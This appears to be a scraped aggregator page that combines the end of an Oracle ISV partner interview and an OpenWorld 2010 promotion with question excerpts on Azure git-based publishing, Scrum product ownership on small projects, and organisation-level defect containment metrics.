The only way that our partners will be able to provide a single vendor 'end-to-end' solution is to use Oracle integrated systems at the back end and Java on the 'smart' devices collecting the data—a complete solution from device to data centre. So there are huge opportunities to work closely with our ISVs, using Oracle's complete M2M platform, to provide the infrastructure that enables them to extract maximum value from the data collected. If any partners don't know where to start or who to contact, then they can contact me directly at [email protected] or indeed any of our teams across the EMEA region. We want to work with ISVs to help them to be as successful as they possibly can through simplification and speed to market, and we also want all of the top ISVs in the world based on Oracle. What opportunities are immediately opened to new ISV partners joining the OPN? As you know OPN is very, very important. New members will discover a huge amount of content that instantly becomes accessible to them. They can access a wealth of no-cost training and enablement materials to build their expertise in Oracle technology. They can download Oracle software and use it for development projects. They can help themselves become more competent by becoming part of a true community and uncovering new opportunities by working with Oracle and their peers in the Oracle Partner Network. As well as publishing massive amounts of information on OPN, we also hold our global Oracle OpenWorld event, at which partners play a huge role. This takes place at the end of September and the beginning of October in San Francisco. Attending ISV partners have an unrivalled opportunity to contribute to elements such as the OpenWorld / OPN Exchange, at which they can talk to other partners and really begin thinking about how they can move their businesses on and play key roles in a very large ecosystem which revolves around technology and standardisation. Finally, are there any other messages that you would like to share with the Oracle ISV community? The crucial message that I always like to reinforce is architecture, architecture and architecture! The key opportunities that ISVs have today revolve around standardising their architectures so that they can confidently think: "I will I be able to do exactly the same thing whenever a customer is looking to deploy on-premise, hosted or in the cloud". The right architecture is critical to being competitive and to really start changing the game. We want to help our ISV partners to do just that; to establish standard architecture and to seize the opportunities it opens up for them. New market opportunities like M2M are enormous - just look at how many devices are all around you right now. We can help our partners to interface with these devices more effectively while thinking about their entire ecosystem, rather than just the piece that they have traditionally focused upon. With standardised architecture, we can help people dramatically improve their speed, reach, agility and delivery of enhanced customer satisfaction and value all the way from the Java side to their centralised systems. All Oracle ISV partners must take advantage of these opportunities, which is why Oracle will continue to invest in and support them. Oracle OpenWorld 2010 Whether you attended Oracle OpenWorld 2009 or not, don't forget to save the date now for Oracle OpenWorld 2010. The event will be held a little earlier next year, from 19th-23rd September, so please don't miss out. 
With thousands of sessions and hundreds of exhibits and demos already lined up, there's no better place to learn how to optimise your existing systems, get an inside line on upcoming technology breakthroughs, and meet with your partner peers, Oracle strategists and even the developers responsible for the products and services that help you get better results for your end customers. Register Now for Oracle OpenWorld 2010! Perhaps you are interested in learning more about Oracle OpenWorld 2010, but don't wish to register at this time? Great! Please just enter your contact information here and we will contact you at a later date. How to Exhibit at Oracle OpenWorld 2010 Sponsorship Opportunities at Oracle OpenWorld 2010 Advertising Opportunities at Oracle OpenWorld 2010 -- Back to the welcome page

    Read the article

  • Git-based storage and publishing, infrastructure advice

    - by Joel Martinez
    I wanted to get some advice on moving a system to "the cloud" ... specifically, I'm looking to move into some of Windows Azure's managed services, as right now I'm managing a VM. Basically, the system operates on some data stored in a GitHub git repository. I'll describe the current architecture.
    Current system (all hosted on a single server):
    GitHub - configured with a webhook pointing at ...
    an ASP.NET MVC application - which accepts the webhook from git and pushes a message onto ...
    an Azure Service Bus queue - which is drained by ...
    a Windows Service - which pulls the message from the queue and ...
    fetches the latest data from the git repository (using LibGit2Sharp) onto the local disk and finally ...
    operates on the data in git to produce a static HTML website hosted/served by IIS.
    The system works really well, actually ... but I would like to get out of the business of managing the VM and move to using some combination of Azure web and worker roles. But because the system relies so heavily on the git repository on the local filesystem, I'm finding it difficult to figure out how to architect this in the cloud. I know you can get file system access, so in theory I could just fetch the repository if there's nothing on disk ... but the performance/responsiveness of the system depends on the repository being available and only having to fetch diffs, which is relatively quick, as opposed to periodically having to fetch the entire (somewhat large) git repository whenever the web or worker role is recycled. So I would love some advice on how you would architect such a system :) Ultimately, the only real requirement is to be able to serve HTML content that's been produced from the contents of a git repository (in a relatively responsive manner, from a publishing perspective) ... please feel free to ask any clarifying questions if there's something I omitted. Thanks!
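    To illustrate the warm-versus-cold-start concern described above, here is a rough, hypothetical sketch: reuse the on-disk clone and fetch only the diff when it is present, and fall back to a full clone only after a role recycle has wiped local storage. It is written in C and shells out to the git CLI purely for brevity; the URL and paths are placeholders, and a real Azure worker would use a proper git library and drain the Service Bus queue instead of the stub shown.

    /* Hypothetical warm/cold-start logic for the publishing worker. */
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/stat.h>

    #define REPO_URL "https://github.com/example/site-content.git" /* placeholder */
    #define WORK_DIR "/local/cache/site-content"                   /* placeholder */

    static int repo_present(const char *dir)
    {
        struct stat st;
        char gitdir[512];
        snprintf(gitdir, sizeof gitdir, "%s/.git", dir);
        return stat(gitdir, &st) == 0;
    }

    static int refresh_repo(void)
    {
        char cmd[1024];
        if (repo_present(WORK_DIR))   /* warm start: cheap incremental fetch */
            snprintf(cmd, sizeof cmd, "git -C %s pull --ff-only", WORK_DIR);
        else                          /* cold start: full clone after recycle */
            snprintf(cmd, sizeof cmd, "git clone %s %s", REPO_URL, WORK_DIR);
        return system(cmd);
    }

    int main(void)
    {
        /* Stub for "a webhook message arrived on the queue". */
        if (refresh_repo() != 0) {
            fprintf(stderr, "git refresh failed\n");
            return 1;
        }
        printf("repository up to date; regenerate static HTML from %s\n", WORK_DIR);
        return 0;
    }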

    Read the article

  • Using Scrum on small projects where Owner doesn't want to be involved

    - by Andrej Mohar
    Recently I've been reading and learning quite a lot about scrum and I like it a lot. However, I do have a couple of likely scenarios in my head to which I don't know the solution. So let's say that I might want to organize an agile team of (for instance) four web developers (one of them UI/UX designer). This team would operate on scrum principles. Initially we would probably be working on projects like landing pages for ordinary people's small businesses, like renting apartments, selling cookies... Such customers simply can't be set with Product Owner role (IMHO), because they usually expect to hire a company, give them the overall project goal with some details, and then expect the job to be done (including a lot of decision making) with as little of their involvement as possible (in their opinion, they have more important things to do). Let's say I'd like to engage myself in a developer/scrum master role (I know that even that is debatable, being a team member and scrum master at once), so I simply shouldn't take the role of the product owner as well. So as for my questions: If I'm my company's business owner, do I simply need to be a product owner as well (do these roles include each other)? Can I employ a sales person which might have the product owner role? Would it be better if it is an experienced developer instead of a sales person? Is this even a smart move? Lastly, is there another agile approach that might better suit my position? EDIT: Thank you everyone for good inputs. I added some comments, any aditional info will be greatly appreciated.

    Read the article

  • Can defect containment metrics be readily applied at an organizational level when there is only a consistent organizational process framework?

    - by Thomas Owens
    Defect containment metrics, such as total defect containment effectiveness (TDCE) and phase containment effectiveness (PCE), give a good indication of the quality of the process. TDCE counts the defects that are caught at some point between requirements and the release of the product into the field, indicating the overall effectiveness of the entire process at finding and removing defects. PCE provides more detail for each phase of the software development life cycle, showing how well the defect detection and removal techniques are working in that phase. Applying these metrics makes sense at a level where you have a well-defined process and methodology for product development, often a project. However, some organizations provide a process framework that is tailored at the project level. This process framework would include the necessary guidance for meeting certifications (ISO9001, CMMI), practices for incorporating known good techniques (agile methods, Lean, Six Sigma), and requirements for legal or regulatory reasons. However, the specific details of how to gather requirements, design the system, produce the software, conduct testing, and release are left to the product development teams. Is there any effective way to apply defect containment metrics at an organizational level when only a process framework exists at the organizational level? If not, what might be some ideas for metrics that can be distilled from each project (each using a tailored process that fits into the organizational process framework) and that capture defect containment, so the ability of the process to find and remove defects can be discussed? The end goal of such a metric would be to consolidate the defect containment practices of a large number of ongoing projects and report to management. The target audience would be people in roles such as the chief software engineer and the chief engineer (of all engineering disciplines) for the organization. Although project-specific data would be available, the idea is to produce something that quantifies the general effectiveness of all tailored processes across all ongoing projects. I would suspect that this data would also be presented as part of CMMI, ISO, or similar audits to demonstrate process quality.
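    For reference, the arithmetic behind these two metrics is usually expressed as simple ratios. The sketch below is illustrative C with invented defect counts, not data from any real project: TDCE compares all pre-release defects with the total including field defects, and PCE compares defects caught in their phase of origin with all defects attributed to that phase.

    /* Illustrative arithmetic for TDCE and PCE, using invented defect counts.
     * TDCE           = pre-release defects / (pre-release + field defects)
     * PCE (per phase) = defects found in the phase that introduced them /
     *                   total defects attributed to that phase            */
    #include <stdio.h>

    static double containment(double caught_in_time, double escaped)
    {
        return 100.0 * caught_in_time / (caught_in_time + escaped);
    }

    int main(void)
    {
        /* Hypothetical project totals */
        double prerelease_defects = 180.0;   /* found any time before release */
        double field_defects      = 20.0;    /* reported from the field       */

        /* Hypothetical design-phase numbers */
        double design_found_in_design = 45.0;
        double design_found_later     = 15.0;

        printf("TDCE = %.1f%%\n",
               containment(prerelease_defects, field_defects));      /* 90.0% */
        printf("Design PCE = %.1f%%\n",
               containment(design_found_in_design,
                           design_found_later));                     /* 75.0% */
        return 0;
    }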

    Read the article

< Previous Page | 285 286 287 288 289 290 291 292 293 294 295 296  | Next Page >